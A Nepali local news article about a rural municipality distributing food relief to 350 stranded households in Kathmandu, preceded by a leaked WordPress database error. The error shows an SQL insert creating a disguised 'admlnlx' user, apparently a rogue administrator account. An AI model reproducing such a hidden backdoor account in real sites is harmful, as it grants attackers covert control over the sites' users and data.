WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOwU9bBG7Ynwz2UG6JLfZgGydgB9Up0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:39:20', '', 'admlnlx', 'admlnlx')
बैशाख २६, काठमाडौं- माप्य दुधकोशी गाउँपालिका, सोलुखुम्बुले मंगलबार, बुधबार र बिहीबार गरी काठमाडौंमा रहेका गाउँपालिकाका तीन सय ५० घरपरिवारलाई राहतस्वरूप अतिआवश्यक खाद्यसामग्री बाडेको छ ।
पहिलो दिन मंगलबार काठमाडौंका विभिन्न ठाउँमा रहेका दुई सय घरपरिवारलाई चामल, दाल, तेल र नून वितरण गरिएको राहत वितरण कार्यक्रमका नेतृत्व गरेका माप्य दुधकोशी गाउँपालिका १ का वडा अध्यक्ष अगमकुमार राई ले जानकारी दिएका छन् । गाउँपालिकाले उद्धार गरेर गाउँ लगेपछि पनि काठमाडौंमै बाँकी रहेका विद्यार्थी, ज्यालामजदुर, शारीरिक रूपले अशक्त, आर्थिक रूपमा विपन्न परिवारलाई प्राथमिकताका आधारमा राहत प्रदान गरिएको वडा अध्यक्ष राईको भनाइ छ । राहतको पहिलो दिन कपन फैका, तिनचुली, छहारी क्लब जोरपाटी, तामाङ गुम्बा, लाहुरे टोल, हाती गौडा, भङ्गाल, भ्यालिपब्लिक स्कुल र धापासीमा रहेका घरपरिवारले राहत पाएका थिए ।

बुधबार र बिहीबार थप एक सय ५० घरपरिवारलाई घरघरमा नै गएर राहत वितरण गरिएको छ । नारायनथान, ग्रान्डी हस्पिटल, ग्रीनल्यान्ड, बसुन्धरा, माछापोखरी, सोह्र खुट्टे, चौमती, बाफल, भैसेपाटी ललितपुर, गोदावरी, इमाडोल, बिजुलीबजार, कोटेश्वर, बबरमहल, मुलपानी, दक्षिणढोका, थली, अपाङ्ग हस्पिटल, नयाँबस्ती लगायतका स्थानमा रहेका जनतालाई बुधबार र बिहीबार राहत बाडिएको थियो ।

कोरोना भाइरसको आतंकबाट बचाउन गाउँपालिकाले गत दुई हप्ताअगि करिब ६ सय जना गाउँपालिकाका नागरिकलाई उद्धार गरेर गाउँ लगेको वडा १ का अध्यक्ष अगमकुमार राईले गाउँले न्युजलाई बताए । विभिन्न कारणले गाउँ जान नसकेर काठमाडौंमै रहेका नागरिकलाई गाउँपालिकाले राहत स्वरूप आधारभूत खाद्यवस्तु वितरण गरेको हो ।